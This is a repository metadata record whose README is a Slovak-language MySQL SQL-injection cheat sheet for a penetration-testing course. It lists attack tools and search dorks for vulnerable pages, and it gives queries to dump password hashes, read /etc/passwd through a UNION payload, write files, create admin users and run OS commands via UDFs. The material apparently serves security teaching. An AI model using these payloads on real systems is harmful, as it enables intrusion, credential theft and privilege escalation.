{"id":18291682,"url":"https://github.com/miroslav-reiter/penetration_testing_sql","last_synced_at":"2026-06-29T22:31:29.311Z","repository":{"id":142388689,"uuid":"439461126","full_name":"miroslav-reiter/Penetration_Testing_SQL","owner":"miroslav-reiter","description":"🐱‍💻 Penetration Testing SQL - Materiály, zdrojové kódy, testovacie sady a prípady, zdroje a návody ku kurzom: Penetračné Testovanie, Testovanie softvéru a SQL kurzy","archived":false,"fork":false,"pushed_at":"2022-05-04T18:55:53.000Z","size":34,"stargazers_count":4,"open_issues_count":0,"forks_count":3,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-10-09T18:36:57.220Z","etag":null,"topics":["cracking","hack","mysql","penetration-test","penetration-testing","penetration-testing-tools","reiter","sql","testing","testing-practices","testing-tools"],"latest_commit_sha":null,"homepage":"https://www.vita.sk/online-kurz-penetracne-testovanie-i-zaciatocnik/","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/miroslav-reiter.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2021-12-17T21:11:12.000Z","updated_at":"2025-09-07T22:35:25.000Z","dependencies_parsed_at":null,"dependency_job_id":"4829e0de-88b3-465a-bd19-0e3a624836af","html_url":"https://github.com/miroslav-reiter/Penetration_Testing_SQL","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/miroslav-reiter/Penetration_Testing_SQL","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/miroslav-reiter%2FPenetration_Testing_SQL","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/miroslav-reiter%2FPenetration_Testing_SQL/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/miroslav-reiter%2FPenetration_Testing_SQL/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/miroslav-reiter%2FPenetration_Testing_SQL/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/miroslav-reiter","download_url":"https://codeload.github.com/miroslav-reiter/Penetration_Testing_SQL/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/miroslav-reiter%2FPenetration_Testing_SQL/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":34945707,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-26T15:22:16.424Z","status":"online","status_checked_at":"2026-06-29T02:00:05.398Z","response_time":58,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cracking","hack","mysql","penetration-test","penetration-testing","penetration-testing-tools","reiter","sql","testing","testing-practices","testing-tools"],"created_at":"2024-11-05T14:14:48.010Z","updated_at":"2026-06-29T22:31:29.298Z","avatar_url":"https://github.com/miroslav-reiter.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"# 🐱‍💻 Penetration Testing SQL\nMateriály, zdrojové kódy, testovacie sady a prípady, zdroje a návody ku kurzu Penetračné Testovanie, Testovanie softvéru a SQL kurzy\n## 🧰 GUI nástroje\n```sql\n-- GUI nástroje\nHavij \nTyrantSQL -- Treba Python 2.*.* + knižnice\nSQL Power Injector\nVega\n```\n## 🔨 CMD nástroje\n```sql\n-- CMD nástroje\nSQLmap \nHashcat\n```\n\n## 🕵️‍♂️ Vyhľadávacie dopyty Google/Bing\n```sql\n-- Vyhľadávacie dopyty Google/Bing\nPHP + MySQL\nphp?id=\nasp?id=\njsp?id=\n\n-- SQLzoo hack\n?answer=1\n```\n## 💡 SQL skripty\n### 🔎 Verzia DB\n```sql\n-- Verzia DB (Version DB)\t\nSELECT @@version\n```\n\n### 📜 Komentáre (Comments)\n```sql\n-- Komentáre (Comments)\t\nSELECT 1; # comment\nSELECT /* comment */ 1;\nSELECT 1; -- comment\n```\n\n### 👤 Aktuálny používateľ (Current User)\t\n```sql\n-- Aktuálny používateľ (Current User)\t\nSELECT user();\nSELECT system_user();\n```\n\n### 🧑‍🤝‍🧑 Zoznam používateľov (List Users)\n```sql\n-- Zoznam používateľov (List Users)\nSELECT user FROM mysql.user; -- priv\n```\n\n### #️⃣ Zoznam hashov hesiel (List Password Hashes)\n```sql\n-- Zoznam hashov hesiel (List Password Hashes)\t\nSELECT host, user, password FROM mysql.user; -- priv\n```\n\n### 🔑 Nástroje na lámanie hesiel (Password crackers)\n```sql\n-- Nástroje na lámanie hesiel (Password crackers)\n-- Password Cracker\t\n-- HashCat, John the Ripper will crack MySQL password hashes\n```\n\n### 📜 Zoznam oprávnení/privilégií (List Privileges)\t\n```sql\n--  Zoznam oprávnení/privilégií (List Privileges)\t\nSELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; -- list user privs\nSELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; -- priv, list user privs\nSELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; \n```\n\n### 🔒 Zoznam oprávnení/privilégií na databáze (List privs on databases (schemas))\n```sql\n-- Zoznam oprávnení/privilégií na databáze (List privs on databases (schemas))\nSELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; -- list privs on columns\n```\n\n### 🔐 Zoznam DBA admin účtov List (DBA Accounts)\t\n```sql\n-- Zoznam DBA admin účtov List (DBA Accounts)\t\nSELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'SUPER';   \nSELECT host, user FROM mysql.user WHERE Super_priv = 'Y'; # priv   \n```\n\n### ✅ Názov aktuálne používanej/pripojenej databázy (Current Database)\t\n```sql\n-- Názov aktuálne používanej/pripojenej databázy (Current Database)\t\nSELECT database()\n```\n\n### 📚 Zoznam databáz (List Databases)\t\n```sql\n-- Zoznam databáz (List Databases)\t\nSHOW databases;\nSELECT schema_name FROM information_schema.schemata; -- for MySQL \u003e= v5.0\nSELECT distinct(db) FROM mysql.db -- priv\n```\n\n### 🧮 Výpis stĺpcov tabuliek (List Columns)\t\n```sql\n-- List Columns\t\nSELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema'\n```\n\n### 📋 Zoznam tabuliek (List Tables)\t\n```sql\n-- Zoznam tabuliek (List Tables)\t\nSHOW tables;\nSELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'\n```\n\n### 📈 Nájdenie tabulky podľa názvu stĺpca (Find Tables From Column Name)\t\n```sql\n-- Nájdenie tabulky podľa názvu stĺpca (Find Tables From Column Name)\t\nSELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username'; -- find table which have a column called 'username'\n```\n\n### 🔦 Výber ntého riadku (Select Nth Row)\t\n```sql\n-- Výber ntého riadku (Select Nth Row)\t\nSELECT host, user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered from 0\nSELECT host, user FROM user ORDER BY host LIMIT 1 OFFSET 1; # rows numbered from 0\n```\n\n### 🧲 Výber ntého znaku (Select Nth Char)\t\n```sql\n-- Výber ntého znaku (Select Nth Char)\t\nSELECT substr('abcd', 3, 1); # returns c\n```\n\n### 💥 Bitový AND (Bitwise AND)\t\n```sql\n-- Bitový AND (Bitwise AND)\t\nSELECT 6 \u0026 2; # returns 2\nSELECT 6 \u0026 1; # returns 0\n```\n\n### 🔠 ASCII hodnota (ASCII Value -\u003e Char)\n```sql\n-- ASCII hodnota (ASCII Value -\u003e Char)\t\nSELECT char(65); # returns A  \n-- Char -\u003e ASCII Value\t  \nSELECT ascii('A'); # returns 65   \n```\n\n### 💯 Pretypovanie (Casting)\n```sql\n--  Pretypovanie (Casting)\t\nSELECT cast('1' AS unsigned integer);\nSELECT cast('123' AS char);\n```\n\n### 💭 Spájanie reťazcov, zreťazenie (String Concatenation/join)\t\n```sql\n--  Spájanie reťazcov, zreťazenie (String Concatenation/join)\t\nSELECT CONCAT('A','B'); # returns AB\nSELECT CONCAT('A','B','C'); # returns ABC\n```\n\n### 🧭 Riadiaca štruktúra/príkaz IF (IF Statement)\t\n```sql\n-- Riadiaca štruktúra/príkaz IF (IF Statement)\t\nSELECT if(1=1,'foo','bar'); -- returns 'foo’\n```\n\n### Riadiaca štruktúra/príkaz CASE (CASE Statement)\t\n```sql\n-- Riadiaca štruktúra/príkaz CASE (CASE Statement)\t\nSELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; # returns A\n```\n\n### 🌶️ Vyhnutie sa uvodzovkám (Avoiding Quotes)\t\n```sql\n-- Vyhnutie sa uvodzovkám (Avoiding Quotes)\t\nSELECT 0×414243; # returns ABC\n```\n\n### ⏲️ Oneskorenie (Time Delay)\t\n```sql\n-- Oneskorenie (Time Delay)\t\nSELECT BENCHMARK(1000000, MD5('A'));\nSELECT SLEEP(5); # \u003e= 5.0.12\n```\n\n### 🧪 Vykonávanie príkazov (Command Execution)\t\n```sql\n-- Vykonávanie príkazov (Command Execution)\t\n/* If mysqld (\u003c5.0) is running as root AND you compromise a DBA account you can execute OS commands by uploading a shared object file into /usr/lib (or similar).  The .so file should contain a User Defined Function (UDF).  raptor_udf.c explains exactly how you go about this.  Remember to compile for the target architecture which may or may not be the same as your attack platform.\n*/\n```\n\n### 📁 Prístup k lokálnemu súboru (Local File Access)\t\n```sql\n-- Prístup k lokálnemu súboru (Local File Access)\t\n…' UNION ALL SELECT LOAD_FILE('/etc/passwd') --  priv, can only read world-readable files\nSELECT * FROM mytable INTO dumpfile '/tmp/somefile'; --  priv, write to file system\n```\n\n### 💣 Hostname, IP adresa, číslo portu (najčastejšie 3306-3309)(Hostname, IP Address, port)\n```sql\n-- Hostname, IP adresa, číslo portu (najčastejšie 3306-3309)(Hostname, IP Address, port)\nSELECT @@hostname;\nSHOW VARIABLES WHERE Variable_name = 'port'\nSELECT SUBSTRING_INDEX(USER(), '@', -1) AS ip, @@hostname as hostname, @@port as port, DATABASE() as current_database;\nmysql\u003e \\s\nmysql\u003e status\n```\n\n### 🆒 Vytvorenie používateľa (Create Users)\n```sql\n-- Vytvorenie používateľa (Create Users)\nCREATE USER test1 IDENTIFIED BY 'pass1'; -- priv\n```\n\n### 🆘 Vymazanie používateľa (Delete Users)\t\n```sql\n-- Vymazanie používateľa (Delete Users)\t\nDROP USER test1; -- priv\n```\n\n### 🔥 Sprav z používateľa admina (Make User DBA)\t\n```sql\n-- Sprav z používateľa admina (Make User DBA)\t\nGRANT ALL PRIVILEGES ON *.* TO test1@'%'; -- priv\n```\n\n### 🔋 Umiestnenie databázových súborov (Location of DB files)\t\n```sql\n-- Umiestnenie databázových súborov (Location of DB files)\t\nSELECT @@datadir;\n```\n\n### ⚡ Defaultná systémová databáza/schéma (Default/System Database) \n```sql\n-- Defaultná systémová databáza/schéma (Default/System Database) \ninformation_schema -- (\u003e= mysql 5.0)\nmysql\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmiroslav-reiter%2Fpenetration_testing_sql","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmiroslav-reiter%2Fpenetration_testing_sql","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmiroslav-reiter%2Fpenetration_testing_sql/lists"}